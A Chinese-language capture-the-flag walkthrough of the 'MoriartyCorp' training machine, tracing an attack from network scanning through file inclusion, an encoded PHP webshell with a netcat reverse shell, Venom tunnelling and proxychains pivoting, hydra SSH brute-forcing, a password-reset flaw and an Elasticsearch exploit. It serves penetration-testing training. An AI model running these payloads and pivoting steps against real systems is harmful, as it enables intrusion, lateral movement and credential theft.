靶機介紹
1)靶機名稱:3-Free-MoriartyCorp
2)難度級別:中-高
3)靶機背景介紹:
①你作為一名特工,協助調查世界最大軍火商的非法交易
②本次靶機共有6個任務,每完成一個任務并提交flag,則解鎖下一個任務
③8000埠用于提交flag和提示下一關資訊,不得對8000埠展開攻擊
④靶場環境基于Docker容器打造
⑤美觀的flag都以#_flag.txt格式存在于目標系統中
⑥flag提交方式為flag{}
4)課程來源:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0
5)靶機地址:鏈接:https://pan.baidu.com/s/1digsxLOoLd0LoQjrp4OZ8g 提取碼:yk91
打靶程序:
1)因靶機通過僅主機方式與宿主機連接,因此可通過二層地址發現的方式,找到靶機的IP地址
#arp-scan -l 192.168.56.0/24

2)對靶機進行全埠掃描
# nmap -p- 192.168.56.106

3)通過靶機提示,方式IP:8000埠對應的web頁面

4)通過上述頁面提示,復制頁面flag{start}開啟靶機,開啟第一個任務

5)通過上述頁面提示,可以發現該靶機對公網開放了一個80埠,此時對80埠進行掃描
# nmap -p80 192.168.56.106

由此可以得出,靶機的處理方法:提交一個flag,就會開啟下一關的任務
6)通過IP:80訪問WEB頁面,通過觀察頁面直接發現不了任何資訊

7)通過點擊Blog post 1或者Blog post 1,發現URL出現了變化

8)通過URL發現,該頁面可能存在檔案包含漏洞,對其進行 基本測驗
http://192.168.56.106/?file=../../../../etc/passwd

通過測驗發現,確實存在檔案包含漏洞
9)對檔案包含漏洞進行利用:加載自己的webshell,進行漏洞的反彈,在kali主機上獲取一個反彈的shell
瀏覽器:
http://192.168.56.106/?file=data:/text/plain;base64,PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7IGVjaG8gJHZhciA/Pg==&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.103+1337+>/tmp/f
kali主機:
nc -lvvp 1337


10)通過反彈shell,輸入命令,查看到在根用戶下存在第一個flag檔案

11)將獲取到的flag,提交至IP:8000埠中,解鎖一下任務

12)按照頁面提示資訊,下一任務是為了攻擊該企業的內部網路,且內部網路地址范圍為172.17.0.3-254
注:因為是內網地址段,所以通過kaLi無法直接訪問到內網主機,此時可通過隧道代理的技術手段穿透內網,使得可以在kali主機上直接訪問內容,此處使用Venom隧道連接工具
下載地址:https://github.com/Dliv3/Venom/releases

13)通過前期資訊搜集發現目標主機是Linux主機,所以把針對Linux系統的代理客戶端程式傳輸到目標服務器上,然后利用客戶端程式與目標系統建立一條隧道,從而穿透內網,先Kali主機搭建web服務,將客戶端程式下載至目標服務器
# cp agent_linux_x64 /var/www/html
# systemctl restart apache2

14)通過第十步反彈的webshell,下載客戶端程式
$ wget http://192.168.56.103/agent_linux_x64

15)在kali主機啟動隧道的服務端程式(監聽9999埠)
# ./admin_linux_x64 -lport 9999

16)啟動客戶端程式,同時指定服務器端的Ip地址,kali服務器端的監聽埠
$ chmod +x agent_linux_x64
$ ./agent_linux_x64 -rhost 192.168.56.103 -rport 9999

此時服務器顯示連接成功

17)在服務器端,輸入shouw命令,發現第一跳節點已出現,然后進入節點1,開啟一個本地的sockes監聽埠1080,這樣就在kali服務端又開啟一個監聽埠
>>> show
>>> goto 1
>>> socks 1080

18)上述步驟完成后,在kali主機配置proxychains,利用proxychains的代理功能,讓kali上的所有工具都可以利用代理去穿透目標系統的內網(在最后一行修改代理服務器的IP地址)
# vi /etc/proxychains4.conf
最后一行編輯:socks5 127.0.0.1 1080
注釋DNS代理:#proxy_dns

19)配置完成后,就可以掛著proxychains去掃描目標系統的內網,此處使用nmap掃描目標系統的內網網段的常用埠
# proxychains nmap 172.17.0.3-254 -p80,22,44

20)通過上述掃描發現開放了172.17.0.4:80,對其進行訪問,訪問時需要在瀏覽器配置代理

訪問出現如下界面

21)在上述頁面中,可以上傳檔案,但是上傳檔案時,需要輸入密碼,此時通過busuit對其進行暴力破解,問題:當瀏覽器把代理指向Burp后,瀏覽器就失去了穿透內網的能力,因為要訪問內網,必須要掛之前建立前的隧道代理(socks代理),為解決該問題,需要在burp中配置二級代理

配置完成后,訪問網頁時,先通過burp代理,再通過socks代理


22)此時可正常訪問,上傳webshell檔案,并進行提交,提交時通過Burp抓包


23)對密碼進行暴力破解,破解出密碼為password,同時可以查看到上傳的目錄

http://172.17.0.4/photo/22/shell.php
24)通過中國蟻劍進行webshell連接,需要先設定中國蟻劍的代理為socks代理,保存后,添加上述連接,連接至服務器后,即可獲取到flag
蟻劍加載器:https://github.com/AntSwordProject/AntSword-Loader
蟻劍原始碼:https://gitcode.net/mirrors/antswordproject/antsword?utm_source=csdn_github_accelerator



25)將flag在IP:8000處進行提交,進入下一個任務,根據任務提示,頁面告訴我們已經有一名特工已經進入目標服務器中,且在目標服務中發現了一些賬號和密碼,同時提示我們,目標系統上有一個SSH的server,可利用上述用戶和密碼登錄至服務器中,但是目標ssh服務器的IP地址需要自己發現:現在內網中發現開啟了22埠的主機172.17.0.5
#nmap -p22 -ST -Pn 172.17.0.3-254

26)形成用戶名和密碼檔案

27)通過hydra進行暴力破解
# proxychains hydra -L users.txt -P password.txt ssh://172.17.0.5

28)通過ssh用戶名和密碼登錄目標服務器后,查看到flag

flag{what_weapons}

29)通過上述提示可知某個主機沒有開放80埠,但是開放了443,8000,8080,8888中的某個埠,繼續通過掃描發現
#proxychains nmap -p443,8000,8080,8888 -sT -Pn 172.17.0.3-254


30)通過訪問發現是一個類似聊天室的頁面,輸入上述提示中的用戶名和密碼
http://172.17.0.6:8000


31)點擊上面chat按鈕,發現了admin用戶和buyer13的聊天記錄

32)點擊修改密碼操作,發現此處存在任意密碼修改漏洞,可以直接修改管理員密碼:抓取資料包后,修改用戶名為admin,修改admin用戶名密碼為123


33)重新訪問網頁,輸入修改后的用戶名和密碼,在聊天室中發現了flag



34)通過上述提示發現,存在一個elasticsearch的服務器,因此對9200埠進行掃描
#proxychains nmap -p9200 -sT -Pn 172.17.0.3-20

35)通過瀏覽器進行訪問,elasticsearch的版本

36)通過kali搜索elasticsearch的可能利用的漏洞
# searchsploit elasticsearch

37)利用代碼,獲取falg
# proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337 172.17.0.7

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/538330.html
標籤:其他
